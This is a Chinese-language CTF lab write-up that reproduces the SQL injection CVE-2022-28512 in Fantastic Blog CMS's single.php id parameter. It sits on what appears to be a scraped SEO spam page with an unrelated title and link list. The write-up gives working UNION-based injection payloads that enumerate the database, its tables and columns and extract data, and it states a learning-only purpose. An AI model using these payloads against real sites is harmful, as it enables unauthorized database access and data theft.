当前位置: 首页 > news >正文

怎样在国外网站购买新鲜橙花做纯露网络推广公司加盟

怎样在国外网站购买新鲜橙花做纯露,网络推广公司加盟,宝山网站建设公司,wordpress页面加载时间代码文章目录 前言一、CVE-2022-28512靶场简述二、找注入点三、CVE-2022-28512漏洞复现1、判断注入点2、爆显位个数3、爆显位位置4 、爆数据库名5、爆数据库表名6、爆数据库列名7、爆数据库数据 总结 前言 此文章只用于学习和反思巩固sql注入知识,禁止用于做非法攻击。…

文章目录

  • 前言
  • 一、CVE-2022-28512靶场简述
  • 二、找注入点
  • 三、CVE-2022-28512漏洞复现
    • 1、判断注入点
    • 2、爆显位个数
    • 3、爆显位位置
    • 4 、爆数据库名
    • 5、爆数据库表名
    • 6、爆数据库列名
    • 7、爆数据库数据
  • 总结


前言

此文章只用于学习和反思巩固sql注入知识,禁止用于做非法攻击。注意靶场是可以练习的平台,不能随意去尚未授权的网站做渗透测试!!!


一、CVE-2022-28512靶场简述

Sourcecodester Fantastic Blog CMS 1.0 中存在一个 SQL 注入漏洞。攻击者可以通过“id=5”参数在“/fantasticblog/single.php”中注入查询。
在这里插入图片描述

二、找注入点

Fantastic Blog (CMS)是一个绝对出色的博客/文章网络内容管理系统。它使您可以轻松地管理您的网站或博客,它为您提供了广泛的功能来定制您的博客以满足您的需求。它具有强大的功能,您无需接触任何代码即可启动并运行您的博客。 该CMS的/single.php路径下,id参数存在一个SQL注入漏洞。
我们就尝试找single.php的界面。
打开发现是有一个登录框,和一个登录注册。但是登录框是search.php,而且尝试sql注入也是无果。(如图所示)
在这里插入图片描述在这里插入图片描述
点开图片发现跳转到single.php界面,成功找到注入地方(如图所示)
在这里插入图片描述

三、CVE-2022-28512漏洞复现

  • 1、判断注入点
  • 2、爆显位个数
  • 3、爆显位位置
  • 4、爆数据库名
  • 5、爆数据库表名
  • 6、爆数据库列名
  • 7、爆数据库数据

1、判断注入点

(如图所示)这里我们老规矩抛出and 1=1 和 and 1=2测试。发现页面依旧正常,排除数字型。直接提交3’发现报错,报错信息为

You have an error in your SQL syntax; check the manual that
corresponds to your MariaDB server version for the right syntax to use
near ‘‘3’’’ at line 1

在这里插入图片描述
通过报错信息可以知道是单引号闭合,这里构造的payload为

id=3'--+

2、爆显位个数

注入语句为

id=3' order by 9--+

发现为10的时候报错,那么显位个数是9了。
在这里插入图片描述

3、爆显位位置

注入语句为

id=-3' union select 1,2,3,4,5,6,7,8,9--+

发现有4可以注入,我就在4注入了
在这里插入图片描述

4 、爆数据库名

注入语句为

id=-3' union select 1,2,3,database(),5,6,7,8,9--+

在这里插入图片描述

得到数据库ctf

5、爆数据库表名

注入语句为

id=-3' union select 1,2,3,group_concat(table_name),5,6,7,8,9 from information_schema.tables where table_schema=database()--+

在这里插入图片描述
得到数据库表名
titles,page_hits,membership_userpermissions,membership_groups,blog_categories,membership_userrecords,membership_users,editors_choice,blogs,links,flag,banner_posts,membership_grouppermissions,visitor_info
关键表名是flag

6、爆数据库列名

注入语句为

id=-3' union select 1,2,3,group_concat(column_name),5,6,7,8,9 from information_schema.columns where table_schema=database() and table_name="flag"--+

得到列名flag

在这里插入图片描述

7、爆数据库数据

注入语句为

id=-3' union select 1,2,3,group_concat(flag),5,6,7,8,9 from flag --+

在这里插入图片描述
得到flag
flag{6bf76a30-c821-429b-b2e7-03b6068cdf36}


总结

这一关的信息收集比较简单,一下子找到注入点了。这是一个简单的单引号闭合简单注入,极其简单。此文章是小白自己为了巩固sql注入而写的,大佬路过请多指教!

http://www.yidumall.com/news/29841.html

相关文章:

  • 成都建设官方网站济南seo优化公司
  • 网站公司seo新闻最新消息10条
  • 北京注册公司网上申请入口小时seo加盟
  • 陈铭生杨昭原型杭州网络排名优化
  • 企业管理咨询服务合同seo排名平台
  • 药品在网站上做标签有哪些分类威海seo优化公司
  • qq代刷网站社区建设网络营销师报名入口
  • 做网站爱台湾永久免费加密一
  • 没有公司自己做网站注册域名在哪里注册
  • 做农产品的b2c网站百度账号是什么
  • 下列哪些属于营销型网站的基础建设网站推广优化排名教程
  • 企业微信下载官方网站店铺运营方案策划
  • 私服网站空间谷歌paypal官网登录入口
  • 做的网站如何更换网站模板推广任务发布平台app
  • 站酷网站源码太原seo关键词排名优化
  • 手机怎么自创网站营销推广是什么
  • 住房和建设委员会网站网站编辑怎么做
  • 针对人群不同 网站做细分指数函数公式
  • 珠海做网站的公司seo优化方案总结
  • 做网站独立云服务器什么意思营销推广方式都有哪些
  • 有关大学生做兼职的网站写软文怎么接单子
  • 青海做网站最好的公司站长号
  • 国外建筑公司网站网站如何被搜索引擎收录
  • 绍兴网站建设方案公关负面处理公司
  • 养生网站建设免费快刷网站
  • 怎么开发网站百度seo如何优化
  • 旅游类网站设计方案百度全网营销
  • wordpress 电商主题张家界百度seo
  • 佛山网站建设公司88网络营销推广方法有哪些
  • 怎么做类似淘宝网站吗关键词挖掘工具